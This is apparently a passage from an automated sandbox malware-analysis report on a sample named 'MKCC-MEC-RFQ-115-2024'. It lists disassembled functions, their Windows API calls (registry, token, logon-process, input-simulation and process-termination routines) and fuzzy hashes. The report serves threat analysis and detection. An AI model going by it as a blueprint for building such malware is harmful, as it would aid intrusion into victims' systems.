                                              • String ID: RoUninitialize$combase.dll
                                              • API String ID: 3489934621-2819208100
                                              • Opcode ID: e3ffc695ad650e8b948e9c37e953956b73143c3fc5222a8638e1dfaec6f23ba1
                                              • Instruction ID: 9fe99dd09a54e50f7708595dde0ba19ef329eceeda6a179034bfd13f5dccd8f6
                                              • Opcode Fuzzy Hash: e3ffc695ad650e8b948e9c37e953956b73143c3fc5222a8638e1dfaec6f23ba1
                                              • Instruction Fuzzy Hash: 13E0B6B8681310AFEB209B60FD0EB243AA4B765B42F204028F151E19A0CBF495C6CA14
                                              Function 0014675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memmove$__itow__swprintf
                                              • String ID:
                                              • API String ID: 3253778849-0
                                              • Opcode ID: 2ac74d2e030658137b5ee0dcb8b02025e330d3075783c8fac3e9a08f62e1acb0
                                              • Instruction ID: cd867f58f1eaf8fbaf9dc49321fbdfea6c8dad16acfce99c790b010f08b19c22
                                              • Opcode Fuzzy Hash: 2ac74d2e030658137b5ee0dcb8b02025e330d3075783c8fac3e9a08f62e1acb0
                                              • Instruction Fuzzy Hash: 1E61EF3050029AAFCF15EF65CC82EFE37A5AF49308F044519F9996B2A3DB74AC45CB91
                                              Function 0016046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                                • Part of subcall function 001610A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00160038,?,?), ref: 001610BC
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00160548
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00160588
                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 001605AB
                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001605D4
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00160617
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00160624
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                              • String ID:
                                              • API String ID: 4046560759-0
                                              • Opcode ID: cf5ab36a556fed1c8fd14bb4fbe0b9b62422d361836fa146a22c8c886680b71d
                                              • Instruction ID: 83ef4312c8d3966dd2c3ca6c409aa70ab8be091117d67cca27ecb60b4a8d7ba4
                                              • Opcode Fuzzy Hash: cf5ab36a556fed1c8fd14bb4fbe0b9b62422d361836fa146a22c8c886680b71d
                                              • Instruction Fuzzy Hash: 52516931108240AFC715EB24DC85EAFBBE9FF88314F04892DF586972A2DB71E915CB52
                                              Function 00165A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetMenu.USER32(?), ref: 00165A82
                                              • GetMenuItemCount.USER32(00000000), ref: 00165AB9
                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00165AE1
                                              • GetMenuItemID.USER32(?,?), ref: 00165B50
                                              • GetSubMenu.USER32(?,?), ref: 00165B5E
                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00165BAF
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountMessagePostString
                                              • String ID:
                                              • API String ID: 650687236-0
                                              • Opcode ID: 05d70c91fda4d19b2268536d499a2922cbe59b20bd90af9b47770f40188b625c
                                              • Instruction ID: 2b0d7725b374dc6b072e6be7fb7eab498bb12867c88184a2c2dc27f188c66cc4
                                              • Opcode Fuzzy Hash: 05d70c91fda4d19b2268536d499a2922cbe59b20bd90af9b47770f40188b625c
                                              • Instruction Fuzzy Hash: 87518E35A00615AFDF15EFA4CC45AAEB7B6EF48310F154469F852BB351CB70AE418B90
                                              Function 0013F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                              Download Yara Rule
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 0013F3F7
                                              • VariantClear.OLEAUT32(00000013), ref: 0013F469
                                              • VariantClear.OLEAUT32(00000000), ref: 0013F4C4
                                              • _memmove.LIBCMT ref: 0013F4EE
                                              • VariantClear.OLEAUT32(?), ref: 0013F53B
                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0013F569
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                              • String ID:
                                              • API String ID: 1101466143-0
                                              • Opcode ID: 681dbc17cc4fc8f026c2133f5feac670206f27704a80629d7caaf1254dd07ee5
                                              • Instruction ID: 1b6466f5f58407e794eebcbb9bacbd000b54bc9fd30cb4c8f1babd98f7a6454c
                                              • Opcode Fuzzy Hash: 681dbc17cc4fc8f026c2133f5feac670206f27704a80629d7caaf1254dd07ee5
                                              • Instruction Fuzzy Hash: 665136B5A00209AFCB14CF58D884AAAB7B8FF4C354F15856EE959DB311D730E952CFA0
                                              Function 001426F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00142747
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00142792
                                              • IsMenu.USER32(00000000), ref: 001427B2
                                              • CreatePopupMenu.USER32 ref: 001427E6
                                              • GetMenuItemCount.USER32(000000FF), ref: 00142844
                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00142875
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                              • String ID:
                                              • API String ID: 3311875123-0
                                              • Opcode ID: ce134aae6f897d377062def623dba2b1cd73d27ca34d25062c51994916fa0784
                                              • Instruction ID: f8486d4ba8d1b28f51949c9fa464ba12509d6de3a84d19311f1d7db765d48a29
                                              • Opcode Fuzzy Hash: ce134aae6f897d377062def623dba2b1cd73d27ca34d25062c51994916fa0784
                                              • Instruction Fuzzy Hash: 7F51B270A0030AEFDF24CF68D888BAEBBF5BF55314F504169F8159B2A1D7B09985CB61
                                              Function 000E1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 000E179A
                                              • GetWindowRect.USER32(?,?), ref: 000E17FE
                                              • ScreenToClient.USER32(?,?), ref: 000E181B
                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000E182C
                                              • EndPaint.USER32(?,?), ref: 000E1876
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                              • String ID:
                                              • API String ID: 1827037458-0
                                              • Opcode ID: 4ec62e20c6f2ec8fa6d97116241c72304c33aac6831d3c29f0a9e1f0a1d461df
                                              • Instruction ID: 20b90ed0fc36d89970392c27578646176c42ad2df6054c2ce188f4475938a7d2
                                              • Opcode Fuzzy Hash: 4ec62e20c6f2ec8fa6d97116241c72304c33aac6831d3c29f0a9e1f0a1d461df
                                              • Instruction Fuzzy Hash: 8141BD71104340AFC710DF25DC84BFA7BF8EB4A724F140628F9A5972A2CB719C85DB61
                                              Function 001573B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,00155134,?,?,00000000,00000001), ref: 001573BF
                                                • Part of subcall function 00153C94: GetWindowRect.USER32(?,?), ref: 00153CA7
                                              • GetDesktopWindow.USER32 ref: 001573E9
                                              • GetWindowRect.USER32(00000000), ref: 001573F0
                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00157422
                                                • Part of subcall function 001454E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0014555E
                                              • GetCursorPos.USER32(?), ref: 0015744E
                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001574AC
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                              • String ID:
                                              • API String ID: 4137160315-0
                                              • Opcode ID: 3f13eee5a08d28084602ef66494ce654d823cab131d5f3a05642d88e93983e2f
                                              • Instruction ID: 14d2178f75f7e807b83a864e919091393b0d56d94d512d404215d1ed74e17c71
                                              • Opcode Fuzzy Hash: 3f13eee5a08d28084602ef66494ce654d823cab131d5f3a05642d88e93983e2f
                                              • Instruction Fuzzy Hash: 9231D272508306ABD720DF14EC49E9BBBAAFF88314F000919F9999B191D770E949CB92
                                              Function 00138D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 001385F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00138608
                                                • Part of subcall function 001385F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00138612
                                                • Part of subcall function 001385F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00138621
                                                • Part of subcall function 001385F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00138628
                                                • Part of subcall function 001385F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0013863E
                                              • GetLengthSid.ADVAPI32(?,00000000,00138977), ref: 00138DAC
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00138DB8
                                              • HeapAlloc.KERNEL32(00000000), ref: 00138DBF
                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00138DD8
                                              • GetProcessHeap.KERNEL32(00000000,00000000,00138977), ref: 00138DEC
                                              • HeapFree.KERNEL32(00000000), ref: 00138DF3
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                              • String ID:
                                              • API String ID: 3008561057-0
                                              • Opcode ID: 737a59a955ed3ddcfc6eb0e6a917bdcd7f73c6830dba87c58f7a807531570aba
                                              • Instruction ID: 508cb8df8f272273ae3133d0aca4869d3abda8b52a771707b0e4acac56786132
                                              • Opcode Fuzzy Hash: 737a59a955ed3ddcfc6eb0e6a917bdcd7f73c6830dba87c58f7a807531570aba
                                              • Instruction Fuzzy Hash: 0411A932601605FFDB149FA4EC09BBE7BAAFF55355F10402DF84997290CB72AA85CB60
                                              Function 00138AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00138B2A
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00138B31
                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00138B40
                                              • CloseHandle.KERNEL32(00000004), ref: 00138B4B
                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00138B7A
                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00138B8E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                              • String ID:
                                              • API String ID: 1413079979-0
                                              • Opcode ID: 1d3ec5110a5a5d8c4d965b0fe5c44e928bea0de7be2e330ef6602cdd843b9462
                                              • Instruction ID: 104bbb2e385b29433d7214296b712b723dc856548db53aa20107687112f248f8
                                              • Opcode Fuzzy Hash: 1d3ec5110a5a5d8c4d965b0fe5c44e928bea0de7be2e330ef6602cdd843b9462
                                              • Instruction Fuzzy Hash: C0112CB250124AEBDF018FA4ED49FDABBA9EF08304F144069FE04A2160C7759D61DB60
                                              Function 0016C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000E134D
                                                • Part of subcall function 000E12F3: SelectObject.GDI32(?,00000000), ref: 000E135C
                                                • Part of subcall function 000E12F3: BeginPath.GDI32(?), ref: 000E1373
                                                • Part of subcall function 000E12F3: SelectObject.GDI32(?,00000000), ref: 000E139C
                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0016C1C4
                                              • LineTo.GDI32(00000000,00000003,?), ref: 0016C1D8
                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0016C1E6
                                              • LineTo.GDI32(00000000,00000000,?), ref: 0016C1F6
                                              • EndPath.GDI32(00000000), ref: 0016C206
                                              • StrokePath.GDI32(00000000), ref: 0016C216
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                              • String ID:
                                              • API String ID: 43455801-0
                                              • Opcode ID: c110c614d22803dccb1e491ce0590544defabff8b9e5dd2e6cf8f52eac181d22
                                              • Instruction ID: 174b30ea918bd284ffac02d4a17fa6fdb6efc2e8a651ee9ed0168fccf45d07fc
                                              • Opcode Fuzzy Hash: c110c614d22803dccb1e491ce0590544defabff8b9e5dd2e6cf8f52eac181d22
                                              • Instruction Fuzzy Hash: F811397600010CBFDB019F90EC88EEA3FADEB08390F048025FA085A5A1C7B19D95DBA0
                                              Function 001003A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001003D3
                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 001003DB
                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001003E6
                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001003F1
                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 001003F9
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00100401
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Virtual
                                              • String ID:
                                              • API String ID: 4278518827-0
                                              • Opcode ID: 5975cfe5fdd4c762cde47822ac4508facbe376f5c788049e6e7865bf2bb7015a
                                              • Instruction ID: f78dcae9c95ae687a62948103832cb9a2d08f81f986f39033c4e711687e7e991
                                              • Opcode Fuzzy Hash: 5975cfe5fdd4c762cde47822ac4508facbe376f5c788049e6e7865bf2bb7015a
                                              • Instruction Fuzzy Hash: 880148B09017597DE3008F5A8C85A52FEA8FF19354F00411BA15847941C7F5A864CBE5
                                              Function 0014568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0014569B
                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001456B1
                                              • GetWindowThreadProcessId.USER32(?,?), ref: 001456C0
                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001456CF
                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001456D9
                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001456E0
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                              • String ID:
                                              • API String ID: 839392675-0
                                              • Opcode ID: 9aa9ed27452185c9b2715dc2fad1e363271f282b430e0be28c254e3e471b1bef
                                              • Instruction ID: e73b20799316f45e482994edb6416fafdb378b4d7e81ef7729b20d6f0d002bbd
                                              • Opcode Fuzzy Hash: 9aa9ed27452185c9b2715dc2fad1e363271f282b430e0be28c254e3e471b1bef
                                              • Instruction Fuzzy Hash: E6F01D32241159BBE7215BA2EC0DEEB7A7CEBC6B51F00016DFA04D146197E11A42C6B5
                                              Function 001474D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,?), ref: 001474E5
                                              • EnterCriticalSection.KERNEL32(?,?,000F1044,?,?), ref: 001474F6
                                              • TerminateThread.KERNEL32(00000000,000001F6,?,000F1044,?,?), ref: 00147503
                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,000F1044,?,?), ref: 00147510
                                                • Part of subcall function 00146ED7: CloseHandle.KERNEL32(00000000,?,0014751D,?,000F1044,?,?), ref: 00146EE1
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00147523
                                              • LeaveCriticalSection.KERNEL32(?,?,000F1044,?,?), ref: 0014752A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                              • String ID:
                                              • API String ID: 3495660284-0
                                              • Opcode ID: b6c2a340efa76c825a0c32072546c1fb44bd0199fbe06d78f93076170daeb2e8
                                              • Instruction ID: 77982e16d2294721a097924ce8c307575d7e3168ae061ce262f4b54ef53add5d
                                              • Opcode Fuzzy Hash: b6c2a340efa76c825a0c32072546c1fb44bd0199fbe06d78f93076170daeb2e8
                                              • Instruction Fuzzy Hash: 7CF05E3A144622EBDB112B64FC9C9EB772AFF45302F000539F202A58B0CBB59882CF50
                                              Function 00138E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00138E7F
                                              • UnloadUserProfile.USERENV(?,?), ref: 00138E8B
                                              • CloseHandle.KERNEL32(?), ref: 00138E94
                                              • CloseHandle.KERNEL32(?), ref: 00138E9C
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00138EA5
                                              • HeapFree.KERNEL32(00000000), ref: 00138EAC
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                              • String ID:
                                              • API String ID: 146765662-0
                                              • Opcode ID: 1277a2fd68edd2933484d60be6eecbdfeaf18148bb6fdde2f88c71f25af31528
                                              • Instruction ID: a47c9b20cdbfe3607a4080c50a0155fab8a5f47ff637e7e507401a97d5fef2a7
                                              • Opcode Fuzzy Hash: 1277a2fd68edd2933484d60be6eecbdfeaf18148bb6fdde2f88c71f25af31528
